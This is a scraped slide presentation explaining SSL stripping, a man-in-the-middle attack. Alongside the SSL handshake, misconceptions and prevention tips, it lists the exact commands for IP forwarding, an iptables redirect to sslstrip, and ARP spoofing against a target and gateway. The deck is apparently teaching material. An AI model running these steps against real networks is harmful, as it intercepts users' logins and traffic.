![Page 1: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/1.jpg)
SSL Spoofing
Man-In-The-Middle attack on SSLDuane Peifer
![Page 2: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/2.jpg)
Summary
§ How SSL works
§ Common SSL misconceptions
§ SSL Spoofing
§ Using sslstrip
§ Preventing SSL Spoofing
§ Examples of stripped sites
![Page 3: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/3.jpg)
How SSL works
Web ServerClient PC
Client hello
Server hello
Certificate
Server hello done
Client key exchange
Change cipher spec
Finished
Change cipher spec
Finished
Secure connection
![Page 4: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/4.jpg)
How SSL works
TCP SSL HTTP
TCP HTTP
HTTP
HTTPS
![Page 5: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/5.jpg)
Common SSL misconceptions
§ HTTPS means I am secure right?
§ What about…− SSL version 2.0 flaws− Weak Ciphers < 128 bit− Certificate keys < 1024 bits− Client vulnerabilities− Server vulnerabilities− Application vulnerabilities
§ SSL can provide a false sense of security
![Page 6: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/6.jpg)
SSL Spoofing
§ Moxie Marlinspike created sslstrip and presented at Black Hat DC 2009.
http://www.thoughtcrime.org/
§ Does not attack SSL itself, but the transition from non-encrypted to encrypted communications.
![Page 7: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/7.jpg)
Common HTTP/HTTPSConnection
HTTP Connection on Port 80
Web Server
Redirect to HTTPS
Client PC
HTTPS Connection on Port 443
Server Certificate
Connection Established
![Page 8: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/8.jpg)
Hijacking Communication
Web ServerClient
PC HTTP requestModified HTTP Response
Non-encrypted
communication
Attacker
HTTP req
uest
Encryp
ted C
ommun
icatio
n
Redire
ct to
HTTPS URL
![Page 9: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/9.jpg)
Using sslstrip
1. Get sslstrip
A. Download and install sslstrip and arpspoof (linux only)§ http://www.thoughtcrime.org/software.html§ http://sourceforge.net/projects/arpspoof/
B. Backtrack 4 (pre-installed)§ http://www.backtrack-linux.org/downloads/
![Page 10: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/10.jpg)
Using sslstrip
2. Configure attack machine for IP forwarding.
echo “1” > /proc/sys/net/ipv4/ip_forward
4. Route all HTTP traffic to sslstrip.
iptables –t nat –A PREROUTING –p tcp
--destination-port 80 –j REDIRECT --to-port
54321
5. Run sslstrip.
sslstrip –l 54321
![Page 11: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/11.jpg)
Using sslstrip
5. Configure ARP spoofing.
arpspoof –i eth0 –t <targetIP> <gatewayIP>
7. Launch a sniffer and collect data.
![Page 12: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/12.jpg)
Expanding the attack
§ What if a root certificate could be installed on the target?
§ The attacker could potentially replace the certificate and maintain a secure connection.
![Page 13: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/13.jpg)
Preventing SSL Spoofing
§ Ensure you are using secure connections. Look for the HTTPS.
§ Be careful about where you use secure sites.
§ Secure machines on the network.
§ Use static ARP tables.*
* This is a TON of work. Understand the ramifications of doing this before starting.
![Page 14: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/14.jpg)
Secure
![Page 15: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/15.jpg)
Stripped
![Page 16: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/16.jpg)
Secure
![Page 17: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/17.jpg)
Stripped
![Page 18: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/18.jpg)
Secure
![Page 19: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/19.jpg)
Stripped
![Page 20: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/20.jpg)
Secure
![Page 21: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/21.jpg)
Stripped
![Page 22: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/22.jpg)
Secure
![Page 23: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/23.jpg)
Stripped
![Page 24: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/24.jpg)
Secure
![Page 25: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/25.jpg)
Stripped
![Page 26: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/26.jpg)
Secure
![Page 27: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/27.jpg)
Stripped
![Page 28: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/28.jpg)
Secure
![Page 29: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/29.jpg)
Stripped
![Page 30: SSL Spoofing - the-eye.eu filePreventing SSL Spoofing § Ensure you are using secure connections. Look for the HTTPS. § Be careful about where you use secure sites. § Secure machines](https://reader030.vdocuments.site/reader030/viewer/2022040218/5e0ccc0d7bd4a65352278b55/html5/thumbnails/30.jpg)
Summit FCU
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script type="text/javascript" src="https://www.summitfcu.org/onlineserv/HB/Signon.cgi?remote=TRUE"></script>
<script type="text/javascript">var bPasswordFocus = false;</script>